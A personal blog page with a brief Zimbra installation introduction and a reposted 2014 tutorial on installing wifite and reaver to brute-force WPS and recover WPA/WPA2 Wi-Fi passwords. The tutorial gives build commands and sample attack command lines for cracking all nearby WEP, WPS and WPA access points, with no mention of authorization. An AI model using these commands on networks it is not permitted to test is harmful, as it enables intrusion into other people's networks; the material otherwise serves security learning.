Mulyana Sandi

Belajar menulis dan berbagi ilmu melalui blog, sedikit tulisan semoga menjadi banyak manfaat :D.

Star Bolic

Belajar menulis dan berbagi ilmu melalui blog, sedikit tulisan semoga menjadi banyak manfaat :D.

Home Mini Server and VoIP

Banyak sekali perangkat yang terselubung diantara ilmu yang bermanfaat, perangkat kecil dengan hasil yang gak bisa di taksir.

Mulyana Sandi

Belajar menulis dan berbagi ilmu melalui blog, sedikit tulisan semoga menjadi banyak manfaat :D.

Antenna Star Bolic

Menembus jarak dengan perangkat yang murah meriah namun memerlukan kreatifitas dalam pembuatannya.

Monday, June 16, 2014

How to Install Zimbra 8.0.2 on Ubuntu 12.04 LTS

Introduction

VMware Zimbra is an enterprise class email, calendar and collaboration suite designed for the cloud, both private and public. The flexibility, scalability and stability of Zimbra make it as a complete email solution that can be deployed in any environment either small or large. Zimbra email server can be accessed from the Zimbra Web Client, Zimbra Desktop offline client, Outlook and a variety of other standards-based email clients and mobile devices.
The three editions of Zimbra are:

1. ZCS Network Edition
2. ZCS hosted email by a Zimbra partner
3. ZCS Open Source Edition (free)

Components included with Zimbra Collaboration Server 8.0.2
  • Postfix - Free Mail Transfer Agent
  • MySQL - Database sofware
  • OpenLDAP - LDAP for User authentication
  • Jetty - Web application server
  • Lucene  - Test and search engine
  • ClamAV  - Antivirus scanner
  • SpamAssassin - Anti-spam software
  • Amavis (amavisd-new) - Content checker
  • Aspell - Spell checker
  • James/Sieve - Email filter

    Installation of Zimbra 8.0.2 Open Source Edition on Ubuntu 12.04 LTS

    Wednesday, June 11, 2014

    Reset the net

    Sunday, June 8, 2014

    Installing wifite and reaver on Ubuntu for brute force attacks against WPS

    Using wifite and reaver together gives us the possibility of obtaining WPA and WPA2passwords without using dictionaries.
    In this post we will see how to install both tools on a Ubuntu machine and a small demonstration of use. Wifite documentation recommends installing other tools  such aspyrytcowpatty and tshark in order to verify WPA handshakes, but in this case we’ll install only reaver, since it’s all we need to attack networks with WPS encryption.
    First we’ll download and install reaver:
    wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
    tar -xzvf reaver-1.4.tar.gz
    Before proceeding, we need to install auxiliary libraries:
    sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
    Finally, we proceed to the installation:
    cd reaver-1.4
    cd src
    ./configure
    make
    sudo make install
    Install wifite is equally simple:
    wget -O wifite.py http://wifite.googlecode.com/svn/trunk/wifite.py
    chmod +x wifite.py
    python wifite.py
    Usually wifite is used with any of the available options. In this example we are interested in finding WPS enabled networks and, therefore, we run the program with the option:
    python wifite.py -wps
    Automatically, wifite enables monitor mode on the network interface -obviously the device must have that capability- and scans looking for networks with WPS enabled. This process ends when they the user types Ctrl + C.
    Then we’ll be asked about our targets. The procedure can be seen perfectly in the figure below. When targets are selected, wifite will use reaver to run a brute force attack on them. Now all you need is patience.
    Atac wifite
    When the attack ends, wifite disables automatically monitor mode on the network interface and exits.
    Other examples of usage can be found on the official website of wifite. Here are some examples:
    • to crack all WEP access points:   ./wifite.py -all -wep
    • to crack all WPS access points with signal strength greater than (or equal to) 50dB:  ./wifite.py -p 50 -wps
    • to attack all access points, use ‘darkc0de.lst‘ for cracking WPA handshakes: ./wifite.py -all –dict /pentest/passwords/wordlists/darkc0de.lst
    • to attack all WPA access points, but do not try to crack — any captured handshakes are saved automatically: ./wifite.py -all -wpa –dict none
    • to crack all WEP access points greater than 50dB in strength, giving 5 minutes for each WEP attack method, and send packets at 600 packets/sec:/wifite.py –pow 50-wept 300-pps 600

    Source : http://www.hacking-etic.cat/?p=731&lang=en